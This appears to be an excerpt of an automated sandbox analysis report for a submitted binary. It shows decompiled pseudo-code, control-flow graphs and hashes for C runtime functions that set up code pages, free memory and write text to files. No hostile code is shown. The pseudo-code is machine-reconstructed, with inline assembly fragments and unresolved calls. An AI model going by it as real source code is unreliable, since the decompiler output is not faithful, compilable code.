                                                                                                                                                                          control_flow_graph 687 a0c245-a0c26a call a0bde0 690 a0c420-a0c421 call a0be51 687->690 691 a0c270-a0c276 687->691 694 a0c426-a0c428 690->694 693 a0c279-a0c27f 691->693 695 a0c285-a0c291 693->695 696 a0c378-a0c397 call 9fa270 693->696 698 a0c429-a0c437 call 9f8f7d 694->698 695->693 699 a0c293-a0c299 695->699 704 a0c39a-a0c39f 696->704 702 a0c370-a0c373 699->702 703 a0c29f-a0c2ab IsValidCodePage 699->703 702->698 703->702 706 a0c2b1-a0c2b8 703->706 707 a0c3a1-a0c3a6 704->707 708 a0c3d6-a0c3e0 704->708 709 a0c2e0-a0c2ed GetCPInfo 706->709 710 a0c2ba-a0c2c6 706->710 713 a0c3d3 707->713 714 a0c3a8-a0c3ae 707->714 708->704 715 a0c3e2-a0c409 call a0bda2 708->715 711 a0c364-a0c36a 709->711 712 a0c2ef-a0c30e call 9fa270 709->712 716 a0c2ca-a0c2d6 call a0beb6 710->716 711->690 711->702 712->716 727 a0c310-a0c317 712->727 713->708 720 a0c3c7-a0c3c9 714->720 726 a0c40a-a0c419 715->726 722 a0c2db 716->722 724 a0c3b0-a0c3b6 720->724 725 a0c3cb-a0c3d1 720->725 722->694 724->725 728 a0c3b8-a0c3c3 724->728 725->707 725->713 726->726 729 a0c41b 726->729 730 a0c319-a0c31e 727->730 731 a0c33a-a0c33d 727->731 728->720 729->690 730->731 732 a0c320-a0c326 730->732 733 a0c342-a0c349 731->733 734 a0c32e-a0c330 732->734 733->733 735 a0c34b-a0c35f call a0bda2 733->735 736 a0c332-a0c338 734->736 737 a0c328-a0c32d 734->737 735->716 736->730 736->731 737->734
                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                          			E00A0C245(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				signed int _t55;
				int _t57;
				signed int _t60;
				signed int _t61;
				short _t64;
				signed char _t66;
				signed int _t67;
				signed char* _t75;
				signed char* _t76;
				int _t78;
				signed int _t83;
				signed char* _t84;
				short* _t85;
				signed int _t86;
				signed char _t87;
				signed int _t88;
				void* _t89;
				signed int _t90;
				signed int _t91;
				short _t92;
				signed int _t93;
				intOrPtr _t95;
				signed int _t96;

				_t89 = __edx;
				_t51 =  *0xa44bac; // 0x96877b9b
				_v8 = _t51 ^ _t96;
				_t95 = _a8;
				_t78 = E00A0BDE0(__eflags, _a4);
				if(_t78 == 0) {
					L36:
					E00A0BE51(_t95);
					goto L37;
				} else {
					_t92 = 0;
					_t83 = 0;
					_t57 = 0;
					_v32 = 0;
					while( *((intOrPtr*)(_t57 + 0xa454f0)) != _t78) {
						_t83 = _t83 + 1;
						_t57 = _t57 + 0x30;
						_v32 = _t83;
						if(_t57 < 0xf0) {
							continue;
						} else {
							if(_t78 == 0xfde8) {
								L22:
								_t55 = _t57 | 0xffffffff;
							} else {
								_t57 = IsValidCodePage(_t78 & 0x0000ffff);
								if(_t57 == 0) {
									goto L22;
								} else {
									if(_t78 != 0xfde9) {
										_t57 = GetCPInfo(_t78,  &_v28);
										__eflags = _t57;
										if(_t57 == 0) {
											__eflags =  *0xa468f8 - _t92; // 0x0
											if(__eflags != 0) {
												goto L36;
											} else {
												goto L22;
											}
										} else {
											E009FA270(_t92, _t95 + 0x18, _t92, 0x101);
											 *(_t95 + 4) = _t78;
											__eflags = _v28 - 2;
											 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
											if(_v28 == 2) {
												__eflags = _v22;
												_t75 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t87 = _t75[1];
														__eflags = _t87;
														if(_t87 == 0) {
															goto L18;
														}
														_t90 = _t87 & 0x000000ff;
														_t88 =  *_t75 & 0x000000ff;
														while(1) {
															__eflags = _t88 - _t90;
															if(_t88 > _t90) {
																break;
															}
															 *(_t95 + _t88 + 0x19) =  *(_t95 + _t88 + 0x19) | 0x00000004;
															_t88 = _t88 + 1;
															__eflags = _t88;
														}
														_t75 =  &(_t75[2]);
														__eflags =  *_t75;
														if( *_t75 != 0) {
															continue;
														}
														goto L18;
													}
												}
												L18:
												_t76 = _t95 + 0x1a;
												_t86 = 0xfe;
												do {
													 *_t76 =  *_t76 | 0x00000008;
													_t76 =  &(_t76[1]);
													_t86 = _t86 - 1;
													__eflags = _t86;
												} while (_t86 != 0);
												 *((intOrPtr*)(_t95 + 0x21c)) = E00A0BDA2( *(_t95 + 4));
												_t92 = 1;
											}
											goto L8;
										}
									} else {
										 *(_t95 + 4) = 0xfde9;
										 *((intOrPtr*)(_t95 + 0x21c)) = _t92;
										 *((intOrPtr*)(_t95 + 0x18)) = _t92;
										 *((short*)(_t95 + 0x1c)) = _t92;
										L8:
										 *((intOrPtr*)(_t95 + 8)) = _t92;
										_t92 = _t95 + 0xc;
										asm("stosd");
										asm("stosd");
										asm("stosd");
										L9:
										E00A0BEB6(_t90, _t95); // executed
										L37:
										_t55 = 0;
									}
								}
							}
						}
						goto L38;
					}
					E009FA270(_t92, _t95 + 0x18, _t92, 0x101);
					_t60 = _v32 * 0x30;
					__eflags = _t60;
					_v36 = _t60;
					_t61 = _t60 + 0xa45500;
					_v32 = _t61;
					do {
						__eflags =  *_t61;
						_t84 = _t61;
						if( *_t61 != 0) {
							while(1) {
								_t66 = _t84[1];
								__eflags = _t66;
								if(_t66 == 0) {
									break;
								}
								_t91 =  *_t84 & 0x000000ff;
								_t67 = _t66 & 0x000000ff;
								while(1) {
									__eflags = _t91 - _t67;
									if(_t91 > _t67) {
										break;
									}
									__eflags = _t91 - 0x100;
									if(_t91 < 0x100) {
										_t34 = _t92 + 0xa454e8; // 0x8040201
										 *(_t95 + _t91 + 0x19) =  *(_t95 + _t91 + 0x19) |  *_t34;
										_t91 = _t91 + 1;
										__eflags = _t91;
										_t67 = _t84[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t84 =  &(_t84[2]);
								__eflags =  *_t84;
								if( *_t84 != 0) {
									continue;
								}
								break;
							}
							_t61 = _v32;
						}
						_t92 = _t92 + 1;
						_t61 = _t61 + 8;
						_v32 = _t61;
						__eflags = _t92 - 4;
					} while (_t92 < 4);
					 *(_t95 + 4) = _t78;
					 *((intOrPtr*)(_t95 + 8)) = 1;
					 *((intOrPtr*)(_t95 + 0x21c)) = E00A0BDA2(_t78);
					_t85 = _t95 + 0xc;
					_t90 = _v36 + 0xa454f4;
					_t93 = 6;
					do {
						_t64 =  *_t90;
						_t90 = _t90 + 2;
						 *_t85 = _t64;
						_t85 = _t85 + 2;
						_t93 = _t93 - 1;
						__eflags = _t93;
					} while (_t93 != 0);
					goto L9;
				}
				L38:
				return E009F8F7D(_t55, _t78, _v8 ^ _t96, _t89, _t92, _t95);
			}



































                                                                                                                                                                          0x00a0c245
                                                                                                                                                                          0x00a0c24d
                                                                                                                                                                          0x00a0c254
                                                                                                                                                                          0x00a0c259
                                                                                                                                                                          0x00a0c265
                                                                                                                                                                          0x00a0c26a
                                                                                                                                                                          0x00a0c420
                                                                                                                                                                          0x00a0c421
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c270
                                                                                                                                                                          0x00a0c270
                                                                                                                                                                          0x00a0c272
                                                                                                                                                                          0x00a0c274
                                                                                                                                                                          0x00a0c276
                                                                                                                                                                          0x00a0c279
                                                                                                                                                                          0x00a0c285
                                                                                                                                                                          0x00a0c286
                                                                                                                                                                          0x00a0c289
                                                                                                                                                                          0x00a0c291
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c293
                                                                                                                                                                          0x00a0c299
                                                                                                                                                                          0x00a0c370
                                                                                                                                                                          0x00a0c370
                                                                                                                                                                          0x00a0c29f
                                                                                                                                                                          0x00a0c2a3
                                                                                                                                                                          0x00a0c2ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c2b1
                                                                                                                                                                          0x00a0c2b8
                                                                                                                                                                          0x00a0c2e5
                                                                                                                                                                          0x00a0c2eb
                                                                                                                                                                          0x00a0c2ed
                                                                                                                                                                          0x00a0c364
                                                                                                                                                                          0x00a0c36a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c2ef
                                                                                                                                                                          0x00a0c2f9
                                                                                                                                                                          0x00a0c301
                                                                                                                                                                          0x00a0c304
                                                                                                                                                                          0x00a0c308
                                                                                                                                                                          0x00a0c30e
                                                                                                                                                                          0x00a0c310
                                                                                                                                                                          0x00a0c314
                                                                                                                                                                          0x00a0c317
                                                                                                                                                                          0x00a0c319
                                                                                                                                                                          0x00a0c319
                                                                                                                                                                          0x00a0c31c
                                                                                                                                                                          0x00a0c31e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c320
                                                                                                                                                                          0x00a0c323
                                                                                                                                                                          0x00a0c32e
                                                                                                                                                                          0x00a0c32e
                                                                                                                                                                          0x00a0c330
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c328
                                                                                                                                                                          0x00a0c32d
                                                                                                                                                                          0x00a0c32d
                                                                                                                                                                          0x00a0c32d
                                                                                                                                                                          0x00a0c332
                                                                                                                                                                          0x00a0c335
                                                                                                                                                                          0x00a0c338
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c338
                                                                                                                                                                          0x00a0c319
                                                                                                                                                                          0x00a0c33a
                                                                                                                                                                          0x00a0c33a
                                                                                                                                                                          0x00a0c33d
                                                                                                                                                                          0x00a0c342
                                                                                                                                                                          0x00a0c342
                                                                                                                                                                          0x00a0c345
                                                                                                                                                                          0x00a0c346
                                                                                                                                                                          0x00a0c346
                                                                                                                                                                          0x00a0c346
                                                                                                                                                                          0x00a0c355
                                                                                                                                                                          0x00a0c35e
                                                                                                                                                                          0x00a0c35e
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c30e
                                                                                                                                                                          0x00a0c2ba
                                                                                                                                                                          0x00a0c2ba
                                                                                                                                                                          0x00a0c2bd
                                                                                                                                                                          0x00a0c2c3
                                                                                                                                                                          0x00a0c2c6
                                                                                                                                                                          0x00a0c2ca
                                                                                                                                                                          0x00a0c2ca
                                                                                                                                                                          0x00a0c2cf
                                                                                                                                                                          0x00a0c2d2
                                                                                                                                                                          0x00a0c2d3
                                                                                                                                                                          0x00a0c2d4
                                                                                                                                                                          0x00a0c2d5
                                                                                                                                                                          0x00a0c2d6
                                                                                                                                                                          0x00a0c426
                                                                                                                                                                          0x00a0c426
                                                                                                                                                                          0x00a0c428
                                                                                                                                                                          0x00a0c2b8
                                                                                                                                                                          0x00a0c2ab
                                                                                                                                                                          0x00a0c299
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c291
                                                                                                                                                                          0x00a0c382
                                                                                                                                                                          0x00a0c38a
                                                                                                                                                                          0x00a0c38a
                                                                                                                                                                          0x00a0c38e
                                                                                                                                                                          0x00a0c391
                                                                                                                                                                          0x00a0c397
                                                                                                                                                                          0x00a0c39a
                                                                                                                                                                          0x00a0c39a
                                                                                                                                                                          0x00a0c39d
                                                                                                                                                                          0x00a0c39f
                                                                                                                                                                          0x00a0c3a1
                                                                                                                                                                          0x00a0c3a1
                                                                                                                                                                          0x00a0c3a4
                                                                                                                                                                          0x00a0c3a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c3a8
                                                                                                                                                                          0x00a0c3ab
                                                                                                                                                                          0x00a0c3c7
                                                                                                                                                                          0x00a0c3c7
                                                                                                                                                                          0x00a0c3c9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c3b0
                                                                                                                                                                          0x00a0c3b6
                                                                                                                                                                          0x00a0c3b8
                                                                                                                                                                          0x00a0c3be
                                                                                                                                                                          0x00a0c3c2
                                                                                                                                                                          0x00a0c3c2
                                                                                                                                                                          0x00a0c3c3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c3c3
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c3b6
                                                                                                                                                                          0x00a0c3cb
                                                                                                                                                                          0x00a0c3ce
                                                                                                                                                                          0x00a0c3d1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c3d1
                                                                                                                                                                          0x00a0c3d3
                                                                                                                                                                          0x00a0c3d3
                                                                                                                                                                          0x00a0c3d6
                                                                                                                                                                          0x00a0c3d7
                                                                                                                                                                          0x00a0c3da
                                                                                                                                                                          0x00a0c3dd
                                                                                                                                                                          0x00a0c3dd
                                                                                                                                                                          0x00a0c3e3
                                                                                                                                                                          0x00a0c3e6
                                                                                                                                                                          0x00a0c3f5
                                                                                                                                                                          0x00a0c3fe
                                                                                                                                                                          0x00a0c403
                                                                                                                                                                          0x00a0c409
                                                                                                                                                                          0x00a0c40a
                                                                                                                                                                          0x00a0c40a
                                                                                                                                                                          0x00a0c40d
                                                                                                                                                                          0x00a0c410
                                                                                                                                                                          0x00a0c413
                                                                                                                                                                          0x00a0c416
                                                                                                                                                                          0x00a0c416
                                                                                                                                                                          0x00a0c416
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c41b
                                                                                                                                                                          0x00a0c429
                                                                                                                                                                          0x00a0c437

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A0BDE0: GetOEMCP.KERNEL32(00000000,00A0C051,?,00000000,00A06982,00A06982,00000000,00000000,?), ref: 00A0BE0B
                                                                                                                                                                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,?,?,00A0C098,00000000,00000000,?,?,00000000,?,?,?,00A06982), ref: 00A0C2A3
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00A0C098,?,?,00A0C098,00000000,00000000,?,?,00000000,?,?,?,00A06982,00000000,00000000), ref: 00A0C2E5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CodeInfoPageValid
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 546120528-0
                                                                                                                                                                          • Opcode ID: 4b01f1f7ee05fe1d07d6b72e133bd1142ea8ebe3a14ca9770ee497937ca6c1d9
                                                                                                                                                                          • Instruction ID: 406f722812ae7eb7b30655f95cfcf588da3a271b6b41522470b91fe10f1c5261
                                                                                                                                                                          • Opcode Fuzzy Hash: 4b01f1f7ee05fe1d07d6b72e133bd1142ea8ebe3a14ca9770ee497937ca6c1d9
                                                                                                                                                                          • Instruction Fuzzy Hash: 10514470A003099EDB20CF75E8816BBFBF5EF95324F14822ED0968B1D1E3759946CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0C036 Relevance: 3.1, APIs: 2, Instructions: 99COMMON
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 740 a0c036-a0c060 call a0c14a call a0bde0 745 a0c062-a0c065 740->745 746 a0c066-a0c07b call a04e1f 740->746 749 a0c0ab 746->749 750 a0c07d-a0c093 call a0c245 746->750 752 a0c0ad-a0c0ba call a0447f 749->752 753 a0c098-a0c09e 750->753 755 a0c0a0-a0c0a5 call 9febab 753->755 756 a0c0bb-a0c0bf 753->756 755->749 759 a0c0c1 call a01c2a 756->759 760 a0c0c6-a0c0d1 756->760 759->760 763 a0c0d3-a0c0dd 760->763 764 a0c0e8-a0c106 760->764 763->764 765 a0c0df-a0c0e7 call a0447f 763->765 764->752 766 a0c108-a0c135 call a0bcd2 764->766 765->764 766->752 771 a0c13b-a0c145 766->771 771->752
                                                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                                                          			E00A0C036(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
				void* _v5;
				char _v12;
				char _v16;
				char* _v20;
				char _v24;
				void* __ebp;
				char _t37;
				signed int _t42;
				signed int _t46;
				char _t49;
				char _t56;
				signed int _t62;
				void* _t73;
				void* _t79;
				signed int _t84;

				_t77 = __edx;
				_push(_a16);
				_push(_a12);
				E00A0C14A(__ebx, __edx, __edi, __esi, __eflags);
				_t37 = E00A0BDE0(__eflags, _a4);
				_v16 = _t37;
				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
					_push(__ebx);
					_push(__esi);
					_push(__edi);
					_t79 = E00A04E1F(0x220);
					_t62 = __ebx | 0xffffffff;
					__eflags = _t79;
					if(__eflags == 0) {
						L5:
						_t84 = _t62;
					} else {
						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
						 *_t79 =  *_t79 & 0x00000000; // executed
						_t42 = E00A0C245(_t77, __eflags, _v16, _t79); // executed
						_t84 = _t42;
						__eflags = _t84 - _t62;
						if(__eflags != 0) {
							__eflags = _a8;
							if(_a8 == 0) {
								E00A01C2A();
							}
							asm("lock xadd [eax], ebx");
							_t64 = _t62 == 1;
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								_t56 = _a12;
								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0xa450c0;
								if( *((intOrPtr*)(_t56 + 0x48)) != 0xa450c0) {
									E00A0447F( *((intOrPtr*)(_t56 + 0x48)));
								}
							}
							 *_t79 = 1;
							_t73 = _t79;
							_t79 = 0;
							 *(_a12 + 0x48) = _t73;
							_t46 =  *0xa44e28; // 0xfffffffe
							__eflags =  *(_a12 + 0x350) & _t46;
							if(__eflags == 0) {
								_v24 =  &_a12;
								_v20 =  &_a16;
								_t49 = 5;
								_v16 = _t49;
								_v12 = _t49;
								_push( &_v16);
								_push( &_v24);
								_push( &_v12);
								E00A0BCD2(_t64, 0, _t84, __eflags);
								__eflags = _a8;
								if(_a8 != 0) {
									 *0xa44de4 =  *_a16;
								}
							}
						} else {
							 *((intOrPtr*)(E009FEBAB(__eflags))) = 0x16;
							goto L5;
						}
					}
					E00A0447F(_t79);
					return _t84;
				} else {
					return 0;
				}
			}


















                                                                                                                                                                          0x00a0c036
                                                                                                                                                                          0x00a0c03e
                                                                                                                                                                          0x00a0c041
                                                                                                                                                                          0x00a0c044
                                                                                                                                                                          0x00a0c04c
                                                                                                                                                                          0x00a0c057
                                                                                                                                                                          0x00a0c060
                                                                                                                                                                          0x00a0c066
                                                                                                                                                                          0x00a0c067
                                                                                                                                                                          0x00a0c068
                                                                                                                                                                          0x00a0c073
                                                                                                                                                                          0x00a0c075
                                                                                                                                                                          0x00a0c079
                                                                                                                                                                          0x00a0c07b
                                                                                                                                                                          0x00a0c0ab
                                                                                                                                                                          0x00a0c0ab
                                                                                                                                                                          0x00a0c07d
                                                                                                                                                                          0x00a0c08a
                                                                                                                                                                          0x00a0c090
                                                                                                                                                                          0x00a0c093
                                                                                                                                                                          0x00a0c098
                                                                                                                                                                          0x00a0c09c
                                                                                                                                                                          0x00a0c09e
                                                                                                                                                                          0x00a0c0bb
                                                                                                                                                                          0x00a0c0bf
                                                                                                                                                                          0x00a0c0c1
                                                                                                                                                                          0x00a0c0c1
                                                                                                                                                                          0x00a0c0cc
                                                                                                                                                                          0x00a0c0d0
                                                                                                                                                                          0x00a0c0d0
                                                                                                                                                                          0x00a0c0d1
                                                                                                                                                                          0x00a0c0d3
                                                                                                                                                                          0x00a0c0d6
                                                                                                                                                                          0x00a0c0dd
                                                                                                                                                                          0x00a0c0e2
                                                                                                                                                                          0x00a0c0e7
                                                                                                                                                                          0x00a0c0dd
                                                                                                                                                                          0x00a0c0e8
                                                                                                                                                                          0x00a0c0ee
                                                                                                                                                                          0x00a0c0f3
                                                                                                                                                                          0x00a0c0f5
                                                                                                                                                                          0x00a0c0fb
                                                                                                                                                                          0x00a0c100
                                                                                                                                                                          0x00a0c106
                                                                                                                                                                          0x00a0c10b
                                                                                                                                                                          0x00a0c116
                                                                                                                                                                          0x00a0c119
                                                                                                                                                                          0x00a0c11a
                                                                                                                                                                          0x00a0c11d
                                                                                                                                                                          0x00a0c123
                                                                                                                                                                          0x00a0c127
                                                                                                                                                                          0x00a0c12b
                                                                                                                                                                          0x00a0c12c
                                                                                                                                                                          0x00a0c131
                                                                                                                                                                          0x00a0c135
                                                                                                                                                                          0x00a0c140
                                                                                                                                                                          0x00a0c140
                                                                                                                                                                          0x00a0c135
                                                                                                                                                                          0x00a0c0a0
                                                                                                                                                                          0x00a0c0a5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0c0a5
                                                                                                                                                                          0x00a0c09e
                                                                                                                                                                          0x00a0c0ae
                                                                                                                                                                          0x00a0c0ba
                                                                                                                                                                          0x00a0c062
                                                                                                                                                                          0x00a0c065
                                                                                                                                                                          0x00a0c065

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A0BDE0: GetOEMCP.KERNEL32(00000000,00A0C051,?,00000000,00A06982,00A06982,00000000,00000000,?), ref: 00A0BE0B
                                                                                                                                                                          • _free.LIBCMT ref: 00A0C0AE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                          • Opcode ID: de29521f87dd086127b6da6275aaca777d7f7c5cb5986884a844bc25abe4348c
                                                                                                                                                                          • Instruction ID: 4fddccc7b4cc038a995e5e22e8f682be8225bef218859fdef5c182c232652521
                                                                                                                                                                          • Opcode Fuzzy Hash: de29521f87dd086127b6da6275aaca777d7f7c5cb5986884a844bc25abe4348c
                                                                                                                                                                          • Instruction Fuzzy Hash: 9431727590020D9FDB11EF58E881ADE77B5FF44320F15426AF9119B2E1EB329D51CB50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A07D23 Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 772 a07d23-a07d78 call 9f97f0 775 a07d7a 772->775 776 a07ded-a07dfd call 9f8f7d 772->776 777 a07d80 775->777 779 a07d86-a07d88 777->779 781 a07da2-a07dc7 WriteFile 779->781 782 a07d8a-a07d8f 779->782 785 a07de5-a07deb GetLastError 781->785 786 a07dc9-a07dd4 781->786 783 a07d91-a07d97 782->783 784 a07d98-a07da0 782->784 783->784 784->779 784->781 785->776 786->776 787 a07dd6-a07de1 786->787 787->777 788 a07de3 787->788 788->776
                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                          			E00A07D23(void* _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				void _v5128;
				long _v5132;
				intOrPtr _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t41;
				long _t43;
				char _t44;
				void* _t46;
				intOrPtr* _t50;
				intOrPtr _t54;
				void* _t55;
				long _t56;
				char* _t57;
				signed int _t58;

				E009F97F0(0x140c);
				_t29 =  *0xa44bac; // 0x96877b9b
				_v8 = _t29 ^ _t58;
				_t47 = _a8;
				_t46 = _a4;
				_t55 = _t46;
				_t50 = _a12;
				_t54 = _a16 + _t50;
				_v5132 =  *((intOrPtr*)( *((intOrPtr*)(0xa46528 + (_a8 >> 6) * 4)) + 0x18 + (_t47 & 0x0000003f) * 0x38));
				asm("stosd");
				_v5136 = _t54;
				asm("stosd");
				asm("stosd");
				if(_t50 < _t54) {
					_t55 = _v5132;
					do {
						_t57 =  &_v5128;
						while(_t50 < _t54) {
							_t44 =  *_t50;
							_t50 = _t50 + 1;
							if(_t44 == 0xa) {
								 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t46 + 8)) + 1;
								 *_t57 = 0xd;
								_t57 = _t57 + 1;
							}
							 *_t57 = _t44;
							_t57 = _t57 + 1;
							if(_t57 <  &_v9) {
								continue;
							}
							break;
						}
						_a12 = _t50;
						_t56 = _t57 -  &_v5128;
						_t41 = WriteFile(_t55,  &_v5128, _t56,  &_v5132, 0); // executed
						if(_t41 == 0) {
							 *_t46 = GetLastError();
						} else {
							_t43 = _v5132;
							 *((intOrPtr*)(_t46 + 4)) =  *((intOrPtr*)(_t46 + 4)) + _t43;
							if(_t43 >= _t56) {
								goto L9;
							}
						}
						goto L12;
						L9:
						_t50 = _a12;
						_t54 = _v5136;
					} while (_t50 < _t54);
				}
				L12:
				return E009F8F7D(_t46, _t46, _v8 ^ _t58, _t54, _t55, _t56);
			}






















                                                                                                                                                                          0x00a07d2d
                                                                                                                                                                          0x00a07d32
                                                                                                                                                                          0x00a07d39
                                                                                                                                                                          0x00a07d3c
                                                                                                                                                                          0x00a07d4e
                                                                                                                                                                          0x00a07d5a
                                                                                                                                                                          0x00a07d60
                                                                                                                                                                          0x00a07d63
                                                                                                                                                                          0x00a07d65
                                                                                                                                                                          0x00a07d6d
                                                                                                                                                                          0x00a07d6e
                                                                                                                                                                          0x00a07d74
                                                                                                                                                                          0x00a07d75
                                                                                                                                                                          0x00a07d78
                                                                                                                                                                          0x00a07d7a
                                                                                                                                                                          0x00a07d80
                                                                                                                                                                          0x00a07d80
                                                                                                                                                                          0x00a07d86
                                                                                                                                                                          0x00a07d8a
                                                                                                                                                                          0x00a07d8c
                                                                                                                                                                          0x00a07d8f
                                                                                                                                                                          0x00a07d91
                                                                                                                                                                          0x00a07d94
                                                                                                                                                                          0x00a07d97
                                                                                                                                                                          0x00a07d97
                                                                                                                                                                          0x00a07d98
                                                                                                                                                                          0x00a07d9a
                                                                                                                                                                          0x00a07da0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07da0
                                                                                                                                                                          0x00a07da8
                                                                                                                                                                          0x00a07dab
                                                                                                                                                                          0x00a07dbf
                                                                                                                                                                          0x00a07dc7
                                                                                                                                                                          0x00a07deb
                                                                                                                                                                          0x00a07dc9
                                                                                                                                                                          0x00a07dc9
                                                                                                                                                                          0x00a07dcf
                                                                                                                                                                          0x00a07dd4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07dd4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a07dd6
                                                                                                                                                                          0x00a07dd6
                                                                                                                                                                          0x00a07dd9
                                                                                                                                                                          0x00a07ddf
                                                                                                                                                                          0x00a07de3
                                                                                                                                                                          0x00a07ded
                                                                                                                                                                          0x00a07dfd

                                                                                                                                                                          APIs
                                                                                                                                                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,?,00A08236,?,00000000,?,?,00000000,00000000), ref: 00A07DBF
                                                                                                                                                                          • GetLastError.KERNEL32(?,00A08236,?,00000000,?,?,00000000,00000000,00000000,?,00A21700,00000010,009FFC43,00000000,00000000,00000000), ref: 00A07DE5
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
